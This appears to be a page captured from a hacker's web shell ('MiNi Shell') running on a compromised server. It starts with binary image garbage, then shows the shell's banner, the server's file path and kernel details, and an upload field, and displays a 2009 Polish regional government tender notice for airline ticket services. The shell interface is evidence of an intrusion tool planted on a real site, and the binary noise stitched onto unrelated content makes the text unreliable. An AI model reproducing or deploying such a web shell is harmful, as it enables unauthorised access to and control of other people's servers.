JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090120/22471-N-2009.html

<p class="kh_header"><b>Gdańsk: Kompleksowa obsługa zakupu i dostawy biletów pasażerskich 
na międzynarodowe połączenia lotnicze dla Urzędu Marszałkowskiego Województwa Pomorskiego w Gdańsku</b><br>
<b>Numer ogłoszenia: 22471 - 2009; data zamieszczenia: 20.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samorząd Województwa Pomorskiego , ul. Okopowa 21/27, 80-810 Gdańsk, woj. pomorskie, tel. 058 3261555, faks 058 3261556.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.woj-pomorskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowa obsługa zakupu i dostawy biletów pasażerskich 
na międzynarodowe połączenia lotnicze dla Urzędu Marszałkowskiego Województwa Pomorskiego w Gdańsku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Kompleksowa obsługa obejmuje: 
1)	sprzedaż biletów lotniczych zgodnie z rezerwacją Zamawiającego, dowóz przez Wykonawcę na własny koszt biletów do siedziby Zamawiającego oraz związane z tym usługi, m.in., pośrednictwo z przewoźnikami w sprawach programów lojalnościowych, reklamacji, zmiana rezerwacji itp.
2)	administrowanie przez Wykonawcę programami lojalnościowymi w imieniu Zamawiającego:
 a) informowanie Zamawiającego o wprowadzeniu przez linie lotnicze programów lojalnościowych i zapoznanie Zamawiającego z ich szczegółami,
b) po zgłoszeniu przez Zamawiającego woli uczestniczenia w programie lojalnościowym, zalogowanie do programu za pośrednictwem wykonawcy i administrowanie programem przez wykonawcę, m.in.:
- rejestracja wszystkich biletów zakupionych w biurach wykonawcy, np. dla programu LOT DLA FIRM,
- negocjowanie i wprowadzanie odpowiedniego identyfikacyjnego wpisu do zakładanych rezerwacji przelotów, np. dla programu Skandynawskich Linii Lotniczych SAS,
- występowanie do linii lotniczych w sprawie przyznawania szczególnych bonusów dla Zamawiającego za kształtowanie przelotów,
3) comiesięczne raportowanie przez Wykonawcę uzbieranych punktów z programów lojalnościowych - informowanie Zamawiającego w formie pisemnej, o stanie punktacji w programach lojalnościowych, sposobach i czasie wykorzystania przyznanych bonusów:
a) raport powinien zawierać przynajmniej wydruk z numeracją biletów, nazwiskami  pasażerów, kierunkiem i datami podróży, wskazaniem wykorzystanej linii lotniczej, cenami.
 b) raport za dany miesiąc będzie przekazywany Zamawiającemu 
w terminie do 10-ego dnia następnego miesiąca,
4)	Wykonawca na życzenie Zamawiającego będzie mógł skonfigurować raport w sposób inny niż opisany wyżej, 
5)	pośrednictwo z przewoźnikami w sprawach reklamacji: 
a)	będzie dotyczyć reklamacji zgłoszonych przez Zamawiającego do Wykonawcy telefonicznie, faksem lub drogą elektroniczną na numery i adres poczty elektronicznej podane w ofercie,
b)	będzie dotyczyć informowania Zamawiającego o trybie i przebiegu rozpatrywania reklamacji, 
c)	reklamacje mogą dotyczyć w szczególności: elastyczności warunków taryf, możliwości bezkosztowej zmiany terminu rezerwacji, nazwiska pasażera lub rezygnacji z biletów.
2. Wykonawca zapewni dostawę do siedziby Zamawiającego, zamawianych biletów lotniczych na własny koszt, maksymalnie w ciągu 48 godzin, od momentu złożenia rezerwacji przez Zamawiającego.
3. Rezerwacje dokonywane będą przez Departamenty Urzędu Marszałkowskiego Województwa Pomorskiego, stosownie do bieżących potrzeb Zamawiającego w jednej z następujących form: telefonicznie, faksem lub drogą elektroniczną na numery i adres poczty elektronicznej podane przez Wykonawcę 
w ofercie.

4. Zamawiający zastrzega sobie, aby odbiór złożonego zamówienia był niezwłocznie potwierdzony faksem lub drogą elektroniczną 
5. Wykonawca zapewni obsługę zamawiającego minimum 6 dni kalendarzowych w tygodniu..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 63.51.20.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. W przetargu mogą wziąć udział wykonawcy, którzy:
1)	 spełniają wymagania określone w art. 22 ust. 1 ustawy, w szczególności: 
     	1)   posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;	
	2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
	3)   znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
	4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
   2)	wykonali w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum jedno zamówienie na kompleksową obsługę zakupu 
i dostawy biletów pasażerskich na międzynarodowe połączenia lotnicze, w którym wartość brutto biletów, dostarczonych na podstawie jednej umowy, wynosiła co najmniej 
200 000 zł brutto. 
2. Ocena spełniania warunków udziału w postępowaniu nastąpi na podstawie dokumentów 
i oświadczeń, przedłożonych przez wykonawcę wraz z ofertą i wyszczególnionych w SIWZ, na zasadzie kwalifikacji spełnia-nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca składa wraz z ofertą następujące dokumenty:
		1)oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu - wg. wzoru na załączniku nr 2 do SIWZ;
	2)aktualny odpis z właściwego rejestru albo aktualne zaświadczenie 
o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
3) wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również   wykonywanych usług, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów  potwierdzających, że te usługi zostały wykonane należycie 
(np. referencje)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 0.50</li>
<li>2 - dostępność usługi - liczba godzin pracy w tygodniu - 0.25</li>
<li>3 - termin dostawy biletu do siedziby zamawiającego - 0.25</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wrotapomorzal.pl/pl/bip/umwp/zamówienia/zamówienia.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.wrotapomorzal.pl/pl/bip/umwp/zamówienia/zamówienia lub Urząd Marszałkowski Województwa Pomorskiego w Gdańsku, przy ul. Okopowej 21/27, 80-810 Gdańsk, pokój nr 8a..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.01.2009 godzina 10:00, miejsce: Urząd Marszałkowski Województwa Pomorskiego w Gdańsku, przy ul. Okopowej 21/27, 80-810 Gdańsk, pokój nr 4..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com